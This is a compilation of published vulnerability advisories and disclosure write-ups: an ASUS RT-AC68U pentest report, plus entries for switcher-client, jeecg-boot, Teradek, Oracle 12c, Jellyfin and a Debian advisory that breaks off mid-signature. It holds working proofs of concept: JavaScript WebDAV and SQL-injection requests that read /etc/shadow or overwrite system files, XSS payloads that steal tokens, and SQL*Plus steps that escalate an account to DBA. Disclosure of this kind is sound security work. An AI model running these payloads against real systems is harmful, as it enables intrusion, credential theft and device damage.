Switcher Client is a JavaScript SDK to work with Switcher API which is cloud-based Feature Flag. Unsanitized input flows into Strategy match operation (EXIST), where it is used to build a regular expression. This may result in a Regular expression Denial of Service attack (reDOS). This issue has been patched in version 3.1.4. As a workaround, avoid using Strategy settings that use REGEX in conjunction with EXIST and NOT_EXIST operations.

**Package**

npm switcher-client (npm)

**Affected versions**

< 3.1.3

**Description**

**Impact**

Unsanitized input flows into Strategy match operation (EXIST), where it is used to build a regular expression. This may result in a Regular expression Denial of Service attack (reDOS).

**Patches**

No fix is available yet. All versions are impacted < 3.1.3.

**Workarounds**

Avoid using Strategy settings that use REGEX in conjunction with EXIST and NOT\_EXIST operations.

**References**

CWE-400: Uncontrolled Resource Consumption  
CAPEC-492: Regular Expression Exponential Blowup

CVE-2023-23925: Regular Expression Denial of Service (ReDoS)

An Insecure Permissions issue in jeecg-boot 2.4.5 and earlier allows remote attackers to gain escalated privilege and view sensitive information via api uri: /sys/user/querySysUser?username=admin.

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2021-37305

**Insecure Permissions issue in jeecg-boot**

Moderate severity GitHub Reviewed Published Feb 3, 2023 to the GitHub Advisory Database • Updated Feb 4, 2023

**Package**

maven org.jeecgframework.boot:jeecg-boot-base (Maven)

**Affected versions**

<= 2.4.5

Published to the GitHub Advisory Database

Feb 3, 2023

Published by the National Vulnerability Database

Feb 3, 2023

GHSA-4f48-qpch-4ppx: Insecure Permissions issue in jeecg-boot

An Insecure Permissions issue in jeecg-boot 2.4.5 allows unauthenticated remote attackers to gain escalated privilege and view sensitive information via the httptrace interface.

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2021-37304

**Insecure Permissions issue in jeecg-boot**

Moderate severity GitHub Reviewed Published Feb 3, 2023 to the GitHub Advisory Database • Updated Feb 4, 2023

**Package**

maven org.jeecgframework.boot:jeecg-boot-base (Maven)

**Affected versions**

<= 2.4.5

Published to the GitHub Advisory Database

Feb 3, 2023

Published by the National Vulnerability Database

Feb 3, 2023

GHSA-rwhw-6c6r-2823: Insecure Permissions issue in jeecg-boot

Directory Traversal vulnerability in Cloud Disk in ASUS RT-AC68U router firmware version before 3.0.0.4.386.41634 allows remote attackers to write arbitrary files via improper sanitation on the target for COPY and MOVE operations.

Over the summer of my junior year, I decided to do some router pentesting. Embedded security always seemed very fun to me. I liked the idea of breaking things that are found in our everyday lives, and what better place to start than my router. I was also inspired by my friend @arinerron who had some success with his router previously.

I dumped the firmware and started analyzing the binaries in Ghidra. I also found a GitHub repository containing a modified version of the source which greatly helped with the reversing process.

**Thoughts**

In the end, I managed to find a pre-auth arbitrary file read vulnerability, which could be used to dump /etc/shadow. From here, this could be chained with an authenticated arbitrary file write vulnerability to achieve code execution.

A shodan search suggests that around 200 thousand routers online could be potentially vulnerable, although because some specialized configuration is required the actual number is probably a bit lower.

One thing I found interesting was how many of the vulnerabilities involved “off-by-slash” issues. For example, requests to /smb/* required authentication but not /smb. If anything, this shows the importance of paying attention to the details when performing code audits.

It was also cool how there was an exploitable SQL injection vulnerability in such a seemingly low-level target.

Even though the code quality wasn’t the highest - many of these vulnerabilities were not very well hidden - this was overall a pretty fun exercise in code-review.

**Timeline**

08/18/2020 - Vulnerability submitted to [email protected]  
08/18/2020 - Vendor response  
10/25/2020 - Beta firmware - official release “in one month”  
12/19/2020 - Additional correspondence  
01/18/2021 - 3.0.0.4.386.41634 released

**Writeup**

_This is an adapted version of the writeup that was sent to the ASUS security team._

This document summarizes the results of my pentesting against ASUS RT-AC68U on the latest firmware version 3.0.0.4.385_20632. These vulnerabilities range from simple denial of service, to a no-interaction unauthenticated remote code execution chain. Many of these likely apply to other similar router versions as well. I also discuss several solutions for remediation.

These were patched in version 3.0.0.4.386.41634.

Overall, I present the following vulnerabilities:

1.  No-interaction pre-authentication RCE chain
2.  No-interaction pre-authentication persistent DOS chain
3.  3 XSS vectors, two of which could chain to RCE
4.  2 temporary denial of service exploits

**Vulnerabilities**

Note that you will need to enable the lighttpd server by going to http://router.asus.com/cloud\_main.asp and enabling Cloud Disk.

Additionally, some of the exploits require the mounting of an external device.

**MOVE/COPY Priming**

No authentication file-write to /mnt/*. An attacker chain this with MOVE/COPY Off By Slash to remotely brick a router, for example, by overwriting /etc/shadow or other important configuration files.

**POC**

There are two relevant primitives - file creation and directory creation.

    fetch("/smb/js/jplayer", {
      "headers": {
        "destination": "https://domain.tld/RT-AC68U/customdir",
        "overwrite": "T",
      },
      "body": "",
      "method": "MOVE"
    });
    

_directory creation_

    fetch("/smb/control", {
      "headers": {
        "destination": "https://domain.tld/RT-AC68U/customdir/testfile",
        "overwrite": "T",
      },
      "body": "",
      "method": "MOVE"
    });
    

_file creation_

This allows an attacker to overwrite arbitrary contents under /mnt. Note that an attacker is able to create any file structure they desire with these primitives. However, while the file layout is attacker controlled, the content within the files is not.

**Analysis**

Improper sanitation on the source for COPY and MOVE operations allows an attacker to load preexisting files from the router, even without authentication.

**Mitigation**

1.  Ensure that con->physical.path starts with /mnt in the mod_webdav.so for HTTP_METHOD_MOVE and HTTP_METHOD_COPY.

**MOVE/COPY Clobbering**

Authenticated arbitrary file write to /*. Can escalate to RCE by overwriting executable files, for example /etc/zcip. Can also modify internal variables such as the router password by writing to /dev/nvram.

**POC**

Create a directory structure as such.

    /mnt
      /USB-NAME
        /path
          /etc
            passwd
    

Run the below JavaScript.

    fetch("/RT-AC68U/USB-NAME/path", { 
      "headers": {
        "overwrite": "T",
        "destination": "https://domain.tld/",
      },
      "body": "",
      "method": "COPY",
    });
    

This will overwrite /etc/passwd.

**Analysis**

Improper sanitation on the target for COPY and MOVE operations gives an attacker an arbitrary file-write primitive.

**Mitigation**

1.  Ensure that p->physical.path starts with /mnt in the mod_webdav.so for HTTP_METHOD_MOVE and HTTP_METHOD_COPY.

**MOVE/COPY Off By Slash**

No-authentication arbitrary file copying from /mnt/* to /*. Can combine with MOVE/COPY Priming to remotely brick a router, for example, by overwriting /etc/shadow or other important configuration files.

**POC**

Create a directory structure as such.

    /mnt
      /etc
        passwd
    

Run the below JavaScript.

    fetch("/RT-AC68U", { 
      "headers": {
        "overwrite": "T",
        "destination": "https://domain.tld/",
      },
      "body": "",
      "method": "COPY",
    });
    

**Analysis**

The authentication handler has an off-by-slash error, matching for /RT-AC68U/ instead of /RT-AC68U. Thus, it allows unauthenticated requests to /RT-AC68U to hit the endpoint (note that adding a slash results in a 401). This allows an attacker to perform a copy operation from /mnt to /, exploiting a similar vulnerability as in MOVE/COPY Clobbering. By creating a fake directory structure with MOVE/COPY Priming, these two vulnerabilities give an attacker a write-anywhere primitive.

**Mitigation**

1.  Ensure the authentication handler filters requests against /RT-AC68U instead of /RT-AC68U/.

**PROPFINDMEDIALIST SQL Injection**

No user-interaction arbitrary file-read. By reading /etc/shadow, an unauthorized remote attacker can disclose a hashed password. Cracking this offline gives the router password. Can be combined with MOVE/COPY Clobbering for a full no-interaction RCE chain.

**POC**

You will need to enable the Digital Media Server functionality.

Run the below javascript, for example in the dev console, while on the AiCloud page.

    (async() => {
    var author = "" + Math.random();
    var path = "/etc/shadow";
    var dId = Math.floor(100000 * Math.random()) + 10000
    var oId = Math.floor(100000 * Math.random()) + 10000
    var pId = Math.floor(100000 * Math.random()) + 10000
    var val = ("a' OR 1 ); INSERT INTO DETAILS (TITLE, ALBUM_ART, ARTIST, ID) VALUES ('a', '" + pId + "', '" + author + "', " + dId + "); -- ").split("'").join("%27")
    console.log(val.length)
    
    await fetch("/smb", {
      "headers": {
        "keyword": val,
        "mediatype": "1",
      },
      "body": "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?><D:propfind xmlns:D=\"DAV:\"><D:prop><D:getlastmodified/><D:getcontentlength/><D:getcontenttype/><D:getmatadata/></D:prop></D:propfind>",
      "method": "PROPFINDMEDIALIST",
    });
    
    val = ("a' OR 1 ); INSERT INTO OBJECTS (PARENT_ID, OBJECT_ID, DETAIL_ID, CLASS) VALUES ('1$7', " + oId + ", " + dId + ", 'container.album.musicAlbum'); -- ").split("'").join("%27")
    console.log(val.length)
    
    
    await fetch("/smb", {
      "headers": {
    
        "keyword": val,
        "mediatype": "1",
      },
      "body": "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?><D:propfind xmlns:D=\"DAV:\"><D:prop><D:getlastmodified/><D:getcontentlength/><D:getcontenttype/><D:getmatadata/></D:prop></D:propfind>",
      "method": "PROPFINDMEDIALIST",
    });
    
    val = ("a' OR 1 );  INSERT INTO ALBUM_ART (PATH, ID) VALUES ('" + path + "', " + pId + "); -- ").split("'").join("%27")
    console.log(val.length)
    
    
    await fetch("/smb", {
      "headers": {
        "keyword": val,
        "mediatype": "1",
      },
      "body": "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?><D:propfind xmlns:D=\"DAV:\"><D:prop><D:getlastmodified/><D:getcontentlength/><D:getcontenttype/><D:getmatadata/></D:prop></D:propfind>",
      "method": "PROPFINDMEDIALIST",
    });
    
    await fetch("/smb", {
      "headers": {
        "classify": "album",
      },
      "body": "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?><D:propfind xmlns:D=\"DAV:\"><D:prop><D:getlastmodified/><D:getcontentlength/><D:getcontenttype/><D:getmatadata/></D:prop></D:propfind>",
      "method": "GETMUSICCLASSIFICATION"
    }).then(a => a.text()).then(b => {
    var aidx = b.indexOf(author)
    var pay = b.substring(b.indexOf("<thumb_image>", aidx) + "<thumb_image>".length, b.indexOf("</thumb_image>", aidx))
    
    console.log(atob(pay))
    })
    })()
    

**Analysis**

        //- Avoid SQL injection!
        if( keyword!=NULL && strstr(keyword->ptr, "'")!=NULL) {      
          Cdbg(DBE, "keyword is invalid!");
          
        ...
        
        if(!buffer_is_empty(keyword)){      
          buffer_urldecode_path(keyword);
    

_mod\_webdav.c_

The check for SQL injection happens before the url decode. This allows an attacker to pass in a URL-encoded single quote, %27, bypassing any SQL injection mitigations. In addition, stacked queries are enabled allowing an attacker to easily chain statements. This can be used to create a fake album, which is ultimately triggered by the GETMUSICCLASSIFICATION method, passing a fake filepath to get_album_cover_image.

        char* album_cover_file = result2[1];
                      
        FILE* fp = fopen(album_cover_file, "rb");
    

_mod\_webdav.c_

The contents of this file pointer are then read into a buffer, and then passed directly back to the attacker.

**Mitigation**

1.  Perform the SQL injection check after bufer_urldecode_path.
2.  Sanity check on album_cover_file, for example strncmp(album_cover_file, "/mnt", 4)

Given a single valid share link, an attacker can disclose any other file.

**POC**

Create a file structure as shown (a single folder with files a.txt and b.txt).

    /mnt/XXX 
      a.txt
      b.txt
    

Create a sharelink for a.txt. Append /%2e%2e/b.txt to the sharelink.

Your final URL should look like https://domain.tld/AICLOUDXXXXXXX/a.txt/%2e%2e/b.txt. Curl the URL - curl -k https://domain.tld/AICLOUDXXXXXXX/a.txt/%2e%2e/b.txt - and note that b.txt gets downloaded.

**Analysis**

mod_aicloud_sharelink_parser URL decodes the path, but fails to filter out path traversals like /../ after decoding.

**Mitigation**

1.  Filter out /../ from AICLOUD paths

**picasa.html XSS**

With user-interaction account takeover - total file disclosure and chain with above to remote code execution.

**POC**

While logged in, visit /smb/css/service/picasa.html?v=%3C%2ftextarea%3E%3Cscript%3Ealert(%27XSS%27)%3C%2fscript%3E.jpg

**Analysis**

The abbreviated JS is shown below.

      var uploadfile_url = getUrlVars()["v"];
      ...
      var this_filename = decodeURIComponent( uploadfile_url
        .substr( uploadfile_url.lastIndexOf("/") + 1, uploadfile_url.length-1 ) );
      ...
      upload_html += '<textarea style="resize: none; width: 292px; height: 82px;" 
        autocomplete="off" id="title" name="title" class="x-form-textarea x-form-field 
        service_upload_field ' + className + '">' + this_filename + '</textarea>';
    

Note that the value of the v parameter is reflected directly into the HTML (after decoding). A malicious filename like </textarea><script>alert('XSS')</script> allows an attacker to inject scripts. This could be done silently from an attacker controlled webpage, giving an attacker access to the router as long as the user is logged in.

**Mitigation**

1.  Sanitize the value of this_filename before injecting into the HTML, as shown below.

    return mystring.replace(/&/g, "&amp;").replace(/>/g, "&gt;").replace(/</g, "&lt;").replace(/"/g, "&quot;");
    

2.  Exit on invalid characters in file name - blacklist <>.

**urlInfo XSS**

Same impact scenario as picasa.html XSS.

**POC**

While logged out, navigate to /RT-AC68U/zz%27onmouseover=a.hidden=true;alert(origin)%20id=a%20style=width:100vw;position:fixed;top:0;height:100vh;opacity:0.01%20a=

**Analysis**

The handler for urlInfo fails to escape single quotes.

              buffer_copy_string_len(out, CONST_STR_LEN("<input class='urlInfo' value='"));        
              buffer_append_string_buffer(out, con->url.rel_path);        
              buffer_append_string_len(out, CONST_STR_LEN("' type='hidden'>"));
    

_connections.c_

**Mitigation**

1.  Sanitize the urlInfo property. Escape single quotes, replacing them with the HTML entity &apos;

**openurl XSS**

Same impact scenario as picasa.html XSS.

**POC**

Navigate to /smb/..%2f'onload='alert(origin) while logged in\`.

**Analysis**

This injects the openurl property on body. The final rendered HTML is as such.

    <body openurl='/smb/../'onload='alert(origin)' fileview_only='1'></body>
    

**Mitigation**

1.  Sanitize the openurl property. Escape single quotes, replacing them with the HTML entity &apos;

**AINVITE POST Handler DOS**

No interaction/authentication denial of service.

**POC**

Run the below code in the developer console on the lighttpd webpage. This sends a POST request with body “junk” to /AINVITE.

    fetch("/AINVITE", {
      "body": "junk",
      "method": "POST"
    });
    

**Analysis**

The handler for post data looks as such.

    iVar1 = parse_postdata_from_chunkqueue(param_1,param_2,param_2->field_0x54,&local_6c);
    if ((iVar1 == 0) && (local_6c != (void *)0x0)) {
      action_value = (char *)get_url_param_ualue(local_6c,"action");
      iVar1 = strcmp(action_value,"register");
    

Note that if get_url_param_ualue(local_6c, "action"), which gets the form data parameter, returns a null value the subsequent call to strcmp will result in a NULL pointer dereference.

**Mitigation**

1.  Add a check for the return value of get_url_param_ualue(local_6c, "action") to see if it is NULL before passing into strcmp.

**/AINVIT DOS**

No interaction/authentication denial of service.

**POC**

Visit /AINVIT. This will crash the lighttpd instance.

**Analysis**

In the handler mod_aicloud_invite.so, the comparison logic looks as such.

    iVar1 = strncmp(*param_2->field_0x108,"/AINVITE",7);
    if (iVar1 == 0) {
      local_38 = strstr(*param_2->field_0x108,"/AINVITE");
      local_38 = local_38 + 1;
      if (local_38 == (char *)0x0) {
        param_2->field_0x80 = 400;
        param_2->field_0x48 = 1;
        ret_code = 2;
      }
    

Note that however, the length of “/AINVITE” is 8. Thus, if /AINVIT is sent, it’ll pass the strncmp comparison, while returning null for strstr. While there is a null check, the pointer is incremented by 1, making it worthless. This results in a null pointer dereference later.

**Mitigation**

1.  Perform the null check before incrementing the pointer.
2.  strncmp with a length of 8

CVE-2021-37317: ASUS RT-AC68U RCE

** UNSUPPORTED WHEN ASSIGNED ** Cross Site Scripting (XSS) vulnerability in Teradek Clip all firmware versions allows remote attackers to run arbitrary code via the Friendly Name field in System Information Settings. NOTE: Vedor states the product has reached End of Life and will not be receiving any firmware updates to address this issue.

**Vulnerability Research****Teradek Cross-Site Scripting Vulnerability Advisory****Multiple Teradek Devices Found Vulnerable to Authenticated Stored Cross-Site Scripting****By: _Tyler Butler_, _Apr 29, 2021_ | _3 min read_**

Back in May, I disclosed a series of cross-site scripting vulnerabilities in the Cube 305 video encoder, a legacy video encoder from vendor Teradek. Teradek is video solutions manufacturer that develops networked devices for broadcast, cinema & imaging applications. After working through initial vulnerability disclosure with Teradek customer support, they informed me that “based on the scope of work involved, the product management team has determined that this issue will not be fixed for the EOL products”. In this blog post, I’ll describe the disclosure timeline and vulnerability details. While they declined to address the vulnerability, Teradek was overall a supportive partner in the vulnerabiltiy disclosure process, providing consistent communication and even going out of their way to provide a detailed list of effected devices.

See the original vulnerability disclosure here

****Index****

*   Disclosure Timeline
*   About the Vendor
*   Vulnerability Details

****⏱ Disclosure Timeline****

I discover the vulnerability and open support ticket #128254 via support.teradek.com

12 May 2021

Teradek responds to initial report and requests additional information.

13 May 2021

Continuous communication between myself and Teradek support

14 May - Jul 15th 2021

Teradek indicates the product will be classified as EOL and the issue will not be addressed. Teradek support provides a full list of effected products so I can engage Mitre CVE team

16 Jul 2021

****💡 About the Vendor****

Teradek produces video encoding devices used by streamers and video professionals alike. According to their website, “Teradek designs and manufactures high performance video solutions for broadcast, cinema, and general imaging applications. From wireless monitoring, color correction, and lens control, to live streaming, SaaS solutions, and IP video distribution, Teradek technology is used around the world by professionals and amateurs alike to capture and share compelling content.” Some of their most popular products include the Bolt, a zero delay HDR solution; the Teradek Ace, a compact wireless video system; and the Serve Pro, a compact live streaming HD system for android and MacOS.

****💀 Vulnerability Details****

The Teradek Cube 305 and all the following Teradek devices are vulnearble to a stored cross-site scripting vulnerability via the Friendly Hostname field within the System Information Settings. Remote authenticated attackers can exploit this vulnerability by embedding malicious JavaScript payloads that execute in the context of victim browsers. The impact of this vulnerability is severe, as malicious code could be used to track victim browsers, steal cookies, or further exploit users.

1.  Bond (firmware releases in the 7.3.x range were the final releases)
2.  Bond II (firmware releases in the 7.3.x range were the final releases)
3.  Bond Pro (firmware releases in the 7.3.x range were the final releases)
4.  Brik (firmware releases in 7.2.x were final)
5.  Clip
6.  Cube (firmware releases in the 7.3.x range were the last releases)
7.  Cube Pro (firmware releases in the 7.3.x range were the final releases)
8.  Slice (1st generation; firmware releases in the 7.3.x range were the final releases)
9.  Sphere
10.  VidiU / VidiU Mini (firmware 3.0.8 was the final release)

****⚰️ Proof of Concept****

**Payload**: Services.Zeroconf.friendlyname=Cube+255+04834<svg/onload=alertxss!\>

    POST /cgi-bin/api.cgi HTTP/1.1
    Host: 172.16.1.1
    Content-Length: 415
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
    Content-Type: application/x-www-form-urlencoded
    Origin: http://172.16.1.1
    Referer: http://172.16.1.1/index.cs
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: serenity-session=29328153
    Connection: close
    
    Services.Zeroconf.friendlyname=Cube+255+04834<svg/onload=alert`xss!`>&Services.Zeroconf.Bonjour.enable=1&Services.HTTP.port=80&Services.HTTP.ssl=disable&Services.DDNS.enable=0&Services.DDNS.system=dyndns%40dyndns.org&Services.DDNS.alias=&Services.DDNS.username=%3Csvg%2Fonload%3Dalert%60xss+3!%60%3E&Services.DDNS.password=&Services.DDNS.interval=60&save=Services&apply=Services&noredirect=%2Findex.cs%3Fpage%3Dnetwork.services&command=set 
    

**Sending Payload with BurpSuite**

**Entering Payload via Device Settings**

**Payload Execution**

CVE-2021-37374: Teradek Cross-Site Scripting Vulnerability Advisory

Oracle Database version 12.1.0.2 suffers from a privilege escalation vulnerability that achieves DBA access via the Spatial component.

Title: Oracle Database Privilege Escalation Through Oracle Spatial Component  
Product:                   Database  
Manufacturer:              Oracle  
Affected Version(s):       12.1.0.2  
Tested Version(s):         12cR1  
Risk Level:                High  
Solution Status:           Fixed in Oracle Critical Patch Update October 2021  
CVE Reference:             N/A, Backported in Oracle CPU OCT 2021  
Author of Advisory:        Emad Al-Mousa

Overview:

Privilege Escalation is a famous security vulnerability (explitation technique)..... attackers seek to compromoise IT systems for multiple objectives such as data exfiltration, cause outage,....etc.

*****************************************  
Vulnerability Details:

The following is a privilege escalation vulnerability where an attacker can escalate his/her account permissions to "DBA" role. DBA role in Oracle is a very powerfull role where the user can view & edit any data within the database, create database objects (tables,malcious code,....etc) and many other harmful activities. The vulnerability exists IF the database system has Oracle "Spatial" component is installed. This vulnerability existed in Oracle 12cR1 and backport fix was issued in October 2021.

To check if Oracle Spatial Component is installed, run the following SQL query as it will list ALL installed components within the database system:

SQL> select comp_name from dba_registry;

*****************************************  
Proof of Concept (PoC):

// I will create an account called ironman using SYS account, the account will be granted “create session” to connect to the database and “create any procedure”, and “execute any procedure” permissions:

sqlplus / as sysdba

SQL> create user ironman identified by iron_123;

SQL> grant create session to ironman;

SQL> grant create any procedure to ironman;

SQL> grant execute any procedure to ironman;

SQL> exit;

// I will now connect using the newly created account “ironman” using sql plus

sqlplus ironman/iron_123

SQL> show user

USER is “IRONMAN”

SQL> select * from session_roles;

no rows selected

SQL> create or replace  procedure  SPATIAL_CSW_ADMIN_USR.hulk  (SQL_TEXT  IN  VARCHAR2) as

    BEGIN

    EXECUTE IMMEDIATE (SQL_TEXT);

    END hulk;  
/

SQL> execute SPATIAL_CSW_ADMIN_USR.hulk('grant DATAPUMP_IMP_FULL_DATABASE to ironman');

SQL> select * from session_roles;

no rows selected

SQL> set role DATAPUMP_IMP_FULL_DATABASE;

// ironman account is escalated to the role DATAPUMP_IMP_FULL_DATABASE

SQL> select * from session_roles;

ROLE

——————————————————————————–

DATAPUMP_IMP_FULL_DATABASE

EXP_FULL_DATABASE

SELECT_CATALOG_ROLE

HS_ADMIN_SELECT_ROLE

HS_ADMIN_ROLE

HS_ADMIN_EXECUTE_ROLE

EXECUTE_CATALOG_ROLE

IMP_FULL_DATABASE

8 rows selected.

// the next escalation level is to DBA role !!

SQL> grant dba to ironman;

SQL> set role dba;

SQL> select * from session_roles;

ROLE

——————————————————————————–

DBA

SELECT_CATALOG_ROLE

HS_ADMIN_SELECT_ROLE

HS_ADMIN_ROLE

HS_ADMIN_EXECUTE_ROLE

EXECUTE_CATALOG_ROLE

DELETE_CATALOG_ROLE

EXP_FULL_DATABASE

Advertisements  
Report this ad

IMP_FULL_DATABASE

DATAPUMP_EXP_FULL_DATABASE

DATAPUMP_IMP_FULL_DATABASE

ROLE

——————————————————————————–

GATHER_SYSTEM_STATISTICS

SCHEDULER_ADMIN

XDBADMIN

XDB_SET_INVOKER

JAVA_ADMIN

JAVA_DEPLOY

WM_ADMIN_ROLE

CAPTURE_ADMIN

OPTIMIZER_PROCESSING_RATE

EM_EXPRESS_ALL

EM_EXPRESS_BASIC

22 rows selected.

--- Conclusion:

The account ironman has been successfully elevated  to the “DBA” role which is the highest database role in Oracle database system.

*****************************************  
- Defensive Techniques:

configure auditing to catch any privilege escalation attempts.  
review database account permissions on regular basis.  
ensure database accounts have strong passwords, and rotate passwords regularly if possible.  
perform VA (vulnerability assesment) scans on regular basis.  
pro-actively patch your systems and database systems.

*****************************************  
References:  
https://www.oracle.com/security-alerts/cpuoct2021.html  
https://databasesecurityninja.wordpress.com/2021/10/22/oracle-database-privilege-escalation-through-oracle-spatial-component/comment-page-1/

Credit:   
Security-In-Depth Contributors: Emad Al-Mousa

Oracle Database 12.1.0.2 Spatial Component Privilege Escalation

In Jellyfin 10.8.x through 10.8.3, the name of a collection is vulnerable to stored XSS. This allows an attacker to steal access tokens from the localStorage of the victim.

**usd-2022-0031 | Jellyfin 10.8.1 - Cross-Site Scripting**

**Advisory ID:** usd-2022-0031  
**Product:** Jellyfin  
**Affected Version:** 10.8.1  
**Vulnerability Type:** CWE-79  
**Security Risk:** Critical  
**Vendor URL:** https://jellyfin.org  
**Vendor Status:** fixed  
**CVE number:** CVE-2023-23635

**Description**

A stored XSS in Jellyfin 10.8.1 allows an remote attacker to inject JavaScript into the name of a collection to perform a Cross-Site Scripting (XSS) attack.  
Because session tokens are stored in the localStorage, the attacker can extract them via javascript.

**Proof of Concept**

The following screenshot shows how an attacker can create a malicious collection.

  
The injected JavaScript code is executed in the user's browser, if a user (e.g. admin) visits the _collections_ page.

  
If you want to do some more interesting stuff with this vulnerability like taking over the admin account, you can use the following payload to read the access tokens from the localStorage.

"><img src=/X onerror=alert(localStorage.getItem("jellyfin\_credentials"))>

Getting the access token and device id allows you to rebuild the request for the _Quick Connect_ Feature.

This feature allows users to login using a PIN. The following request sets a PIN.

POST /QuickConnect/Authorize?Code=111111 HTTP/1.1  
Host: localhost:8096  
User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:102.0) Gecko/20100101 Firefox/102.0  
Accept: \*/\*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Emby-Authorization: MediaBrowser Client="Jellyfin Web", Device="Firefox", DeviceId="TW96aWxsYS81LjAgKFgxMTsgTGludXggeDg2XzY0OyBydjoxMDAuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC8xMDAuMHwxNjU2NzU0NTEwMjcz", Version="10.8.1", Token="7bd97aae0924484884d7d13a74e9517c"  
Origin: \[http://localhost:8096\]()  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
Connection: close  
Cookie: sfcsrftoken=S82egH1Csl8FsxnMPQ6NGzXCWL3tiI8tNUvfsNyXnAVoGGthaUjsjrWesdhvu9Gc  
Content-Length: 0

**Fix**

It is recommended to treat all input on the website as potentially dangerous.  
Hence, all output that is dynamically generated based on user-controlled data should be encoded according to its context.  
The majority of programming languages support standard procedures for encoding meta characters.

**References**

*   https://owasp.org/www-community/attacks/xss/
*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23635 

**Timeline**

*   **2022-07-18**: First contact request via security@jellyfin.org
*   **2022-08-02**: Vulnerability details submitted
*   **2022-08-16**: Fixed by Vendor
*   **2023-01-16:** Requested CVE assigned
*   **2023-01-19**: The advisory is published

**Credits**

This security vulnerability was found by Christian Pöschl of usd AG.

CVE-2023-23635: Security Advisory usd- 2022-0031 | usd HeroLab

In Jellyfin 10.8.x through 10.8.3, the name of a playlist is vulnerable to stored XSS. This allows an attacker to steal access tokens from the localStorage of the victim.

**usd-2022-0030 | Jellyfin 10.8.1 - Cross-Site Scripting**

**Advisory ID:** usd-2022-0030  
**Product:** Jellyfin  
**Affected Version:** 10.8.1  
**Vulnerability Type:** Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)  
**Security Risk:** Critical  
**Vendor URL:** https://jellyfin.org  
**Vendor acknowledged vulnerability:** Yes  
**Vendor Status:** fixed  
**CVE number:** CVE-2023-23636

**Description**

The playlist name in Jellyfin 10.8.1 is vulnerable to a stored XSS which allows a low privileged user to steal access tokens from high privileged users.  
The injected code is triggered everytime a user visits the playlist page. Since access tokens are stored in the **localStorage** an attacker is able to take over accounts by reading their values.

**Proof of Concept**

The following screenshot shows the executed JavaScript payload in the victim's browser.

The following request creates a payload with injected _name_.

POST /Playlists?Name=%22%3E%3Cimg%20src%3D%2FX%20onerror%3Dalert(document.domain)%3E&Ids=0358e400bf19a370e7f2e4e69f2af64d&userId=e9239683c3384717810a900f1c2c7eb5 HTTP/1.1  
Host: localhost:8096  
Content-Length: 0  
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"  
accept: application/json  
Content-Type: application/json  
\[...\]

**Fix**

It is recommended to treat all input on the website as potentially dangerous.  
Hence, all output that is dynamically generated based on user-controlled data should be encoded according to its context.  
The majority of programming languages support standard procedures for encoding meta characters.

**References**

*   https://owasp.org/www-community/attacks/xss/
*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23636 

**Timeline**

*   **2022-07-18:** First contact request via security@jellyfin.org
*   **2022-08-02:** Vulnerability details submitted
*   **2022-08-16:** Fixed by Vendor
*   **2023-01-16:** Requested CVE assigned
*   **2023-01-19**: The advisory is published

**Credits**

This security vulnerability was found by Christian Pöschl of usd AG.

CVE-2023-23636: Security Advisory usd-2022-0030 | usd HeroLab

Debian Linux Security Advisory 5335-1 - Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in denial of service or spoofing.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5335-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
February 01, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openjdk-17  
CVE ID         : CVE-2022-21618 CVE-2022-21619 CVE-2022-21624 CVE-2022-21628  
                 CVE-2022-39399 CVE-2023-21835 CVE-2023-21843

Several vulnerabilities have been discovered in the OpenJDK Java runtime,  
which may result in denial of service or spoofing.

For the stable distribution (bullseye), these problems have been fixed in  
version 17.0.6+10-1~deb11u1.

We recommend that you upgrade your openjdk-17 packages.

For the detailed security status of openjdk-17 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/openjdk-17

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmParr8ACgkQEMKTtsN8  
TjaUew/9Fpsfn3GMMnCaheFv/IAODAauovmI71hUQpohxEX5eL17mLWX4s5L0qtu  
HHHlexE4EtWNRk2KUtsm5oroX95mseqNhXObvX7dho0pGn8eM0N9FuJ3eXdWMxxP  
MW8Q+MADyDHuWB5/Fb6a16NpCIqzeUgS2CEMaM+6BCp2O2Mz+O0EfH/3MC9GW3z7  
sP+IUD3nm0+03J00CgZfEvRN2g1NElIerCQiSMeNC7T21V4Lz7MnVNCV1jyTvdm9  
IV5HXuVdEjeSbdC2sJbnF3geGDV5cLBcY7Il8JbcT/ADCUGkxM8wnilsiRrDj+e0  
gTuturVqUxLvjjxjpMNdLZrmv3WUMuBgFNkVpriDGXEjalsCX2yfYVQUyNGUZHCC  
o0VEuPjEKFQh8anUiugwF4ZqMfosbZcbrT7eTWFsJlAMTiBi+k8Qs3K9q9XeIW8Y  
LnMCiaTLzC+3ZL65J0r2E+CiGrie/DGaWxLaXVxt2/Qux3MOf5mKoVZSHEl7jKey  
sIIZoav9p8/Rj/3DmMLJi+visUH/aptKzbgXEAIAjSMs9pXtgu4PYZ5faAecRC9K  
